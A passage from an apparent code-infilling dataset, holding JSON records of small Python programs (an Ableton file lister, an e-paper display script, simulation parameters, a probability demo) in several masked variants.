convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n",
"step-4": "import os, sys, datetime, csv, platform\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\nfilePath = '/Users/blakenicholson/Dropbox/Ableton Projects'\ndirs = mylistdir(filePath)\nprint(dirs)\nprint(collectElements(dirs))\nfile = open('testtext.txt', 'w+')\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n",
"step-5": "import os, sys, datetime, csv, platform\n\n####FUNCTIONS####\n\n#Get Creation Time\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n \n#Get Date From String\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n#Get Filename\ndef getFilename(name):\n return os.path.basename(name)\n\n# Get File Creation Time\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n#Print List\ndef print_list(x):\n\tfor i in range(0,len(x)):\n\t\tprint(x[i])\n\treturn x\n\n#Listing Files\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith((filetype)):\n matches.append(os.path.join(root, filename))\n return matches\n\t\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist\n if not (x.startswith('.'))]\n\ndef collectElements(dir):\n ## collecting elements into a list\n for directory in dir:\n for filename in directory:\n if filename.endswith(\".als\"):\n thefiles.append(filename) \n return thefiles\n\n\n## INPUTDIRECTORIES\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\n\n## Examples of Directories\n#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects\n#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project\n\nfilePath = r\"/Users/blakenicholson/Dropbox/Ableton Projects\"\n#filePath = raw_input('File path would you like to use: ')\ndirs = mylistdir(filePath)\nprint(dirs)\n\n\nprint(collectElements(dirs))\n\n#Writes contents of filePath to a txt file\nfile = open(\"testtext.txt\",\"w+\")\nfor item in fileList(filePath):\n file.write(os.path.basename(item) +\", \"+convertIntToTimestamp(get_lastupdate_date(item))+\", \"+convertIntToTimestamp(creation_date(item))+\", \"+os.path.abspath(item)+\"\\n\") \nfile.close\n\n#convert txt -> csv\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name','Updated Date','Created Date','Path'])\n for item in fileList(filePath):\n a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])\n ",
"step-ids": [
5,
8,
9,
11,
12
]
}
|
[
5,
8,
9,
11,
12
] |
#!/usr/bin/python
# -*- coding:utf-8 -*-
import epd2in7
import time
from PIL import Image,ImageDraw,ImageFont
import traceback
try:
epd = epd2in7.EPD()
epd.init()
epd.Clear(0xFF)
time.sleep(2)
epd.sleep()
except:
print 'traceback.format_exc():\n%s' % traceback.format_exc()
exit()
|
normal
|
{
"blob_id": "14cac4f11830511923ee1ce0d49ec579aec016fd",
"index": 4720,
"step-1": "#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport epd2in7\nimport time\nfrom PIL import Image,ImageDraw,ImageFont\nimport traceback\n\ntry:\n epd = epd2in7.EPD()\n epd.init()\n epd.Clear(0xFF)\n \n time.sleep(2)\n \n epd.sleep()\n \nexcept:\n print 'traceback.format_exc():\\n%s' % traceback.format_exc()\n exit()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# print all cards with even numbers.
cards = ["2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "A"]
for card in cards:
try:
number = int(card)
if number % 2 == 0: # modulo operator
print(card, "is an even card.")
except ValueError:
print (card, "can not be divided")
|
normal
|
{
"blob_id": "b5180a2dbe1f12e1bbc92874c67ea99c9a84a9ed",
"index": 19,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n",
"step-3": "cards = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0:\n print(card, 'is an even card.')\n except ValueError:\n print(card, 'can not be divided')\n",
"step-4": "\n# print all cards with even numbers.\n\ncards = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"J\", \"Q\", \"K\", \"A\"]\n\nfor card in cards:\n try:\n number = int(card)\n if number % 2 == 0: # modulo operator\n print(card, \"is an even card.\")\n except ValueError:\n print (card, \"can not be divided\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
### Global parameters ###
seconds_per_unit_time = 0.01
#########################
pars_spont = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"r_in": 0.04,
"w_in": 0.05,
"init_W": "random",
"init_scale": 0.2,
}
pars_avg_dw = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"init_W": None,
}
pars_learn = {
"tau_p": 3.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.065,
"rho": 0.0015,
"rho_ext": 0.0418,
"N": 81,
"w_max": 0.026,
"w_ext": 0.26,
"mu": 0.07,
"seed": None,
"assembly_size": 20,
"inputs": 1,
"t_ON": 18_000,
"t_OFF": 10_000_000,
"init_W": "random",
"init_scale": 0.1,
}
pars_drift = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.002,
"N": 72,
"w_max": 0.056,
"mu": 0.148,
"seed": None,
"T1": 50_000_000,
"T2": 50_000_000,
"init_W": "random",
"init_scale": 0.25,
}
pars_drift2 = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"rho_small": 0.0003,
"N": 120,
"w_max": 0.024,
"mu": 0.05,
"seed": None,
"t_switch": 30_000_000,
"p_switch": 0.03,
"init_W": "assemblies",
"num_assemblies": 6,
"assembly_size": 20,
}
pars_sizes = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 150,
"mu": 0.04,
"seed": None,
"tend": 150_000_000,
"init_W": "random",
"init_scale": 0.2,
}
pars_intertwined = {
"seconds_per_unit_time": 0.01,
"tau_p": 2.6,
"tau_d": 6.5,
"amp_p": 0.08,
"amp_d": -0.042,
"rho": 0.0015,
"w_max": 0.018,
"N": 190,
"num_assemblies": 20,
"swaps": 0,
"mu": 0.017,
"seed": None,
"t_eq": 20_000_000,
"n_sims": 900,
"t_sim": 100_000,
"init_W": "intertwined",
}
pars_avg_dw = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 50_000_000,
"init_W": None,
}
pars_overlap = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"rho_small": 0.0001,
"N": 60,
"w_max": 0.024,
"mu": 0.045,
"seed": None,
"t_end": 100_000_000,
"init_W": "assemblies",
"num_assemblies": 3,
"assembly_size": 20,
}
pars_sparse = {
"tau_p": 2.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.0533,
"rho": 0.0015,
"N": 50,
"w_max": 0.05,
"mu": 0.07,
"seed": None,
"tend": 20_000_000,
"init_W": None,
"density": 0.8,
}
pars_input_strength = {
"tau_p": 3.5,
"tau_d": 5.0,
"amp_p": 0.08,
"amp_d": -0.066,
"rho": 0.0015,
"N": 50,
"N_target": 20,
"w_max": 0.026,
"mu": 0.01,
"seed": None,
"r_in": 0.04,
"w_in": 0.05,
"init_W": None,
}
|
normal
|
{
"blob_id": "8f17c1ed0cb273a88b986cd7fe7a45439211d536",
"index": 8641,
"step-1": "<mask token>\n",
"step-2": "seconds_per_unit_time = 0.01\npars_spont = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'r_in': 0.04, 'w_in': 0.05, 'init_W': 'random', 'init_scale': 0.2\n }\npars_avg_dw = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'init_W': None}\npars_learn = {'tau_p': 3.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.065,\n 'rho': 0.0015, 'rho_ext': 0.0418, 'N': 81, 'w_max': 0.026, 'w_ext': \n 0.26, 'mu': 0.07, 'seed': None, 'assembly_size': 20, 'inputs': 1,\n 't_ON': 18000, 't_OFF': 10000000, 'init_W': 'random', 'init_scale': 0.1}\npars_drift = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.002, 'N': 72, 'w_max': 0.056, 'mu': 0.148, 'seed': None, 'T1':\n 50000000, 'T2': 50000000, 'init_W': 'random', 'init_scale': 0.25}\npars_drift2 = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'rho_small': 0.0003, 'N': 120, 'w_max': 0.024, 'mu': \n 0.05, 'seed': None, 't_switch': 30000000, 'p_switch': 0.03, 'init_W':\n 'assemblies', 'num_assemblies': 6, 'assembly_size': 20}\npars_sizes = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 150, 'mu': 0.04, 'seed': None, 'tend': 150000000,\n 'init_W': 'random', 'init_scale': 0.2}\npars_intertwined = {'seconds_per_unit_time': 0.01, 'tau_p': 2.6, 'tau_d': \n 6.5, 'amp_p': 0.08, 'amp_d': -0.042, 'rho': 0.0015, 'w_max': 0.018, 'N':\n 190, 'num_assemblies': 20, 'swaps': 0, 'mu': 0.017, 'seed': None,\n 't_eq': 20000000, 'n_sims': 900, 't_sim': 100000, 'init_W': 'intertwined'}\npars_avg_dw = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 50000000, 'init_W': None}\npars_overlap = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'rho_small': 0.0001, 'N': 60, 'w_max': 0.024, 'mu': \n 0.045, 'seed': None, 't_end': 100000000, 'init_W': 'assemblies',\n 'num_assemblies': 3, 'assembly_size': 20}\npars_sparse = {'tau_p': 2.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': -0.0533,\n 'rho': 0.0015, 'N': 50, 'w_max': 0.05, 'mu': 0.07, 'seed': None, 'tend':\n 20000000, 'init_W': None, 'density': 0.8}\npars_input_strength = {'tau_p': 3.5, 'tau_d': 5.0, 'amp_p': 0.08, 'amp_d': \n -0.066, 'rho': 0.0015, 'N': 50, 'N_target': 20, 'w_max': 0.026, 'mu': \n 0.01, 'seed': None, 'r_in': 0.04, 'w_in': 0.05, 'init_W': None}\n",
"step-3": "### Global parameters ###\n\nseconds_per_unit_time = 0.01\n\n#########################\n\npars_spont = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"r_in\": 0.04,\n \"w_in\": 0.05,\n \"init_W\": \"random\",\n \"init_scale\": 0.2,\n}\n\npars_avg_dw = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"init_W\": None,\n}\n\npars_learn = {\n \"tau_p\": 3.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.065,\n \"rho\": 0.0015,\n \"rho_ext\": 0.0418,\n \"N\": 81,\n \"w_max\": 0.026,\n \"w_ext\": 0.26,\n \"mu\": 0.07,\n \"seed\": None,\n \"assembly_size\": 20,\n \"inputs\": 1,\n \"t_ON\": 18_000,\n \"t_OFF\": 10_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.1,\n}\n\n\npars_drift = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.002,\n \"N\": 72,\n \"w_max\": 0.056,\n \"mu\": 0.148,\n \"seed\": None,\n \"T1\": 50_000_000,\n \"T2\": 50_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.25,\n}\n\n\npars_drift2 = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"rho_small\": 0.0003,\n \"N\": 120,\n \"w_max\": 0.024,\n \"mu\": 0.05,\n \"seed\": None,\n \"t_switch\": 30_000_000,\n \"p_switch\": 0.03,\n \"init_W\": \"assemblies\",\n \"num_assemblies\": 6,\n \"assembly_size\": 20,\n}\n\npars_sizes = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 150,\n \"mu\": 0.04,\n \"seed\": None,\n \"tend\": 150_000_000,\n \"init_W\": \"random\",\n \"init_scale\": 0.2,\n}\n\n\npars_intertwined = {\n \"seconds_per_unit_time\": 0.01,\n \"tau_p\": 2.6,\n \"tau_d\": 6.5,\n \"amp_p\": 0.08,\n \"amp_d\": -0.042,\n \"rho\": 0.0015,\n \"w_max\": 0.018,\n \"N\": 190,\n \"num_assemblies\": 20,\n \"swaps\": 0,\n \"mu\": 0.017,\n \"seed\": None,\n \"t_eq\": 20_000_000,\n \"n_sims\": 900,\n \"t_sim\": 100_000,\n \"init_W\": \"intertwined\",\n}\n\npars_avg_dw = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 50_000_000,\n \"init_W\": None,\n}\n\npars_overlap = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"rho_small\": 0.0001,\n \"N\": 60,\n \"w_max\": 0.024,\n \"mu\": 0.045,\n \"seed\": None,\n \"t_end\": 100_000_000,\n \"init_W\": \"assemblies\",\n \"num_assemblies\": 3,\n \"assembly_size\": 20,\n}\n\n\npars_sparse = {\n \"tau_p\": 2.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.0533,\n \"rho\": 0.0015,\n \"N\": 50,\n \"w_max\": 0.05,\n \"mu\": 0.07,\n \"seed\": None,\n \"tend\": 20_000_000,\n \"init_W\": None,\n \"density\": 0.8,\n}\n\npars_input_strength = {\n \"tau_p\": 3.5,\n \"tau_d\": 5.0,\n \"amp_p\": 0.08,\n \"amp_d\": -0.066,\n \"rho\": 0.0015,\n \"N\": 50,\n \"N_target\": 20,\n \"w_max\": 0.026,\n \"mu\": 0.01,\n \"seed\": None,\n \"r_in\": 0.04,\n \"w_in\": 0.05,\n \"init_W\": None,\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from functions.service_funcs.get_data import get_data_character
def clean_room(update):
char, db_sess = get_data_character(update, return_sess=True)
# удаляем старую комнату и всю инфу о ней
if char and char.room:
if char.room.mobs:
for mob in char.room.mobs:
db_sess.delete(mob)
if char.room.items:
for item in char.room.items:
db_sess.delete(item)
db_sess.delete(char.room)
db_sess.commit()
|
normal
|
{
"blob_id": "4d57fa22282d7b3f8adabedd7a04e32767181890",
"index": 5693,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-3": "from functions.service_funcs.get_data import get_data_character\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-4": "from functions.service_funcs.get_data import get_data_character\n\n\ndef clean_room(update):\n char, db_sess = get_data_character(update, return_sess=True)\n # удаляем старую комнату и всю инфу о ней\n if char and char.room:\n if char.room.mobs:\n for mob in char.room.mobs:\n db_sess.delete(mob)\n if char.room.items:\n for item in char.room.items:\n db_sess.delete(item)\n db_sess.delete(char.room)\n db_sess.commit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .Buzzer import BuzzerController
from .Card import CardScanner
from .RFID import RFIDController
from .Servo import ServoController
__all__ = ["BuzzerController", "CardScanner", "RFIDController", "ServoController"]
|
normal
|
{
"blob_id": "8fa78824a38a3b0c1f51aceacab671f987ea2705",
"index": 9635,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['BuzzerController', 'CardScanner', 'RFIDController',\n 'ServoController']\n",
"step-3": "from .Buzzer import BuzzerController\nfrom .Card import CardScanner\nfrom .RFID import RFIDController\nfrom .Servo import ServoController\n__all__ = ['BuzzerController', 'CardScanner', 'RFIDController',\n 'ServoController']\n",
"step-4": "from .Buzzer import BuzzerController\nfrom .Card import CardScanner\nfrom .RFID import RFIDController\nfrom .Servo import ServoController\n\n__all__ = [\"BuzzerController\", \"CardScanner\", \"RFIDController\", \"ServoController\"]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import division
import random as rnd
import math
from collections import Counter
from matplotlib import pyplot as plt
import ds_library
import ds_algebra
import ds_probability
import ds_gradient_descent
def normal_pdfs_visualization():
xs = [x/10.0 for x in range(-50, 50)]
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')
plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')
plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')
plt.legend()
plt.title('Various Normals pdfs')
plt.show()
def normal_cdfs_visualization():
xs = [x/10.0 for x in range(-50, 50)]
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')
plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')
plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')
plt.legend()
plt.title('Various Normals cdfs')
plt.show()
def random_kid():
return rnd.choice(['boy', 'girl'])
def girl_probability():
both_g = 0
older_g = 0
either_g = 0
for _ in range(10000):
younger = random_kid()
older = random_kid()
if older == 'girl':
older_g += 1
if older == 'girl' and younger == 'girl':
both_g += 1
if older == 'girl' or younger == 'girl':
either_g += 1
print("P(both/older): ", both_g/older_g)
print("P(both/either): ", both_g/either_g)
def compare_binomial_dist_to_normal_approx(p, n, nb_points):
data = [ds_probability.binomial(n, p) for _ in range(nb_points)]
#showing actual binomial samples on bar chart
histogram = Counter(data)
plt.bar([x - 0.4 for x in histogram.keys()],
[v / nb_points for v in histogram.values()],
0.8, color='0.7')
mu_px = p * n
sigma_px = math.sqrt(n*p*(1 - p))
#line chart that shows the normal approximation of the binomial variable
xs = range(min(data), max(data)+1)
ys = [ds_probability.normal_cdf(i+0.5, mu_px, sigma_px) - ds_probability.normal_cdf(i-0.5, mu_px, sigma_px) for i in xs]
plt.plot(xs, ys)
plt.title('Binomial Dist vs Normal approximation')
plt.show()
if __name__ == '__main__':
# print('5/2: ' + str(5/2))
# print('5//2: ' + str(5//2))
# A=[[1,2,3], [1,1,1], [2,2,3]]
# print(ds_algebra.get_col(A,1))
# girl_probability()
#normal_cdfs_visualization()
# print(ds_probability.inverse_normal_cdf(0.98))
# compare_binomial_dist_to_normal_approx(0.75, 100, 100000)
#Gradient Descent example
#random starting point
v = [rnd.randint(-100, 100) for _ in range(3)]
tolerance = 0.000001
while True:
gradient = ds_gradient_descent.square_gradient(v)
next_v = ds_gradient_descent.step(v, gradient, -0.01)
if ds_algebra.distance(next_v, v) < tolerance:
print('final resting point: ', v)
break
v = next_v
|
normal
|
{
"blob_id": "c0adc0032a2647a19d3540c057fa9762906e5f62",
"index": 4439,
"step-1": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\n<mask token>\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\n<mask token>\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\ndef normal_cdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals cdfs')\n plt.show()\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\nif __name__ == '__main__':\n v = [rnd.randint(-100, 100) for _ in range(3)]\n tolerance = 1e-06\n while True:\n gradient = 